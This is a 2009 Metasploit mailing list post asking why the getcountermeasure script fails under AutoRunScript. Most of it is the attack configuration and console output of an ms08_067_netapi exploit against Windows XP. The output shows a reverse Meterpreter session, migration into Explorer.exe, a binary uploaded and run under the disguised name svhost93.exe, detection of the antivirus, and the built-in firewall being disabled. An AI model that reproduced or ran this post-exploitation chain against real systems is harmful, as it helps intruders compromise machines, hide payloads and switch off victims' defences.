Metasploit mailing list archives
Problems using getcountermeasure
From: skysbsb at gmail.com (David Gomes)
Date: Mon, 12 Oct 2009 18:18:28 -0300
Hi, i have configured the AutoRunScript like this: set AutoRunScript multiscript -s /pentest/exploits/framework3/autorun.txt # cat autorun.txt migrate Explorer.exe getcountermeasure -d uploadexec -e lv.exe When i ran the cmd exploit: msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese - Brazilian [*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX) [*] Triggering the vulnerability... [*] Sending stage (719360 bytes) [*] Meterpreter session 3 opened (x.x.x.102:4444 -> x.x.x.9:1166) [*] Running Multiscript script..... [*] Running script List ... [*] running script migrate Explorer.exe [*] Migrating to Explorer.exe... [*] Current server process: svchost.exe (976) [*] New server process: Explorer.EXE (1904) [*] running script getcountermeasure -d [*] Running Getcountermeasure on the target... [*] Checking for contermeasures... [-] Error: NameError undefined local variable or method `client' for #<#<Class:0xb67a8760>:0xb638c62c> [-] Error in script: getcountermeasure -d [*] running script uploadexec -e lv.exe [*] Running Upload and Execute Meterpreter script.... [*] Uploading lv.exe.... [*] lv.exe uploaded! [*] Uploaded as C:\DOCUME~1\Usuario\CONFIG~1\Temp\svhost93.exe [*] running command C:\DOCUME~1\Usuario\CONFIG~1\Temp\svhost93.exe [*] Finnished! meterpreter > run getcountermeasure -d [*] Running Getcountermeasure on the target... [*] Checking for contermeasures... [*] Possible countermeasure found sched.exe C:\Arquivos de programas\Avira\AntiVir Desktop\sched.exe [*] Possible countermeasure found avguard.exe C:\Arquivos de programas\Avira\AntiVir Desktop\avguard.exe [*] Possible countermeasure found avgnt.exe C:\Arquivos de programas\Avira\AntiVir Desktop\avgnt.exe [*] Getting Windows Built in Firewall configuration... [*] Disabling Built in Firewall..... [*] Checking DEP Support Policy... meterpreter > As u can see, the getcountermeasure fails when ran in the autorun script... i have tried put the cmd in another place, like after 'uploadexec -e lv.exe' or before 'migrate Explorer.exe' but still does not work. But, when i exec the cmd after the spawn of the meterpreter session, it's work. This is right? -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20091012/5e2d8419/attachment.html>
Current thread:
- Problems using getcountermeasure David Gomes (Oct 12)
- Problems using getcountermeasure Carlos Perez (Oct 12)